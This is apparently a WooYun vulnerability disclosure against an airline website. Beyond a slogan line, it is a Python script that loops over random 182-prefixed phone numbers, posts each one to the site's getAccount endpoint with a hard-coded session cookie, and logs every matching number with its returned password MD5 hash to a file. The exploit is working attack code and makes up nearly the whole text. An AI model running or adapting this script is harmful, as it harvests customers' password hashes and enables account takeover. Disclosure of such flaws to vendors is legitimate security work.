WooYun.org

蓝天航空，网连天下。官网地址：
http://www.952111.com/
贴上脚本代码：
#!/usr/bin/python
#coding=utf8
import json
import urllib
import httplib
import random
import requests
import time
import threading
def test():
while True:
phoneNo=random.choice(['182'])+''.join(random.sample('0123456789',8))
data={"mobile":phoneNo}
body=urllib.urlencode(data)
headers={"User-Agent":"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0",
"Accept":"application/json, text/javascript, */*; q=0.01",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With":"XMLHttpRequest",
"Referer":"http://www.952111.com/member/findpwd/checkpass?mobile=18722103783&authcode=123456",
"Content-Length":"18",
"Cookie":"Hm_lvt_e87753b349bd4094206d8dd4e0df514a=1429783095,1429848025; JSESSIONID=de4a19cd-50aa-4d3e-ba17-68a1919d3cd7; iwapp=7pevvhesj7kiilhf4t6t5dpquxs5w6md3mf5punacr6jpsjdp3lino4gdhy3zxqq3abf6qjvupgbo; Hm_lpvt_e87753b349bd4094206d8dd4e0df514a=1429851600",
"Connection":"keep-alive",
"Pragma":"no-cache",
"Cache-Control":"no-cache"
}
#rtime=int(time.time())
url="http://www.952111.com/getAccount"
httpClient=httplib.HTTPConnection("www.952111.com","80")
httpClient.request("POST", url, body, headers)
response=httpClient.getresponse()
rep=response.read()
print rep
print type(rep)
result=json.loads(rep)
print result
print type(result)
a=result.get("result")
print a
print type(a)
if a:
print "test"
f=open("D://test.txt","a")
f.write(str(phoneNo)+" md5:"+str(result.get("data").get("loginpwd"))+"\n")
f.close()
if __name__=="__main__":
t=threading.Thread(target=test)
t.run()